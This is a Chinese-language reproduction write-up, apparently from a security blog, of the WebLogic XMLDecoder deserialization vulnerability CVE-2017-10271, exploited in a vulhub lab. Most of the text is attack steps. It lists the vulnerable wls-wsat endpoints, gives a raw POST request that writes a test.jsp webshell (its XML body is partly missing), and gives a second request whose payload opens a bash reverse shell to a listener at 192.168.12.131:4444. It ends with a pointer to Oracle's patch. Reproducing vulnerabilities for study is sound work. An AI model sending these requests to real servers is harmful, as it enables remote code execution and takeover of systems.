weblogic-XMLDecoder反序列化(CVE-2017-10271)

weblogic-XMLDecoder反序列化(CVE-2017-10271)

漏洞复现-CVE-2017-10271

0x00 前言

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

影响版本 : 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0

0x01 环境搭建

这里是用的vulhub进行环境搭建

weblogic-XMLDecoder反序列化(CVE-2017-10271)_第1张图片

0x02 工具利用

1、WeblogicVuln

weblogic-XMLDecoder反序列化(CVE-2017-10271)_第2张图片

weblogic-XMLDecoder反序列化(CVE-2017-10271)_第3张图片

0x03 手工利用

# 漏洞地址,这些漏洞地址均可尝试
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

1、准备好webshell

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638


    
    
    
     
    servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp
    
    
    ]]>
    
    
    
    
    
    
    

2、打开burp抓包,改包后重发

weblogic-XMLDecoder反序列化(CVE-2017-10271)_第4张图片

访问http://192.168.12.130:7001/bea_wls_internal/test.jsp验证漏洞是否存在

weblogic-XMLDecoder反序列化(CVE-2017-10271)_第5张图片

3、改包后再次发送,kali打开监听

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your_ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

 





/bin/bash


-c


bash -i >& /dev/tcp/192.168.12.131/4444 0>&1








weblogic-XMLDecoder反序列化(CVE-2017-10271)_第6张图片

4、获取shell

weblogic-XMLDecoder反序列化(CVE-2017-10271)_第7张图片

0x04 修复方案

官方补丁修复 
前往Oracle官网下载10月份所提供的安全补丁 
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

你可能感兴趣的:(漏洞复现,网络安全,web安全,weblogic)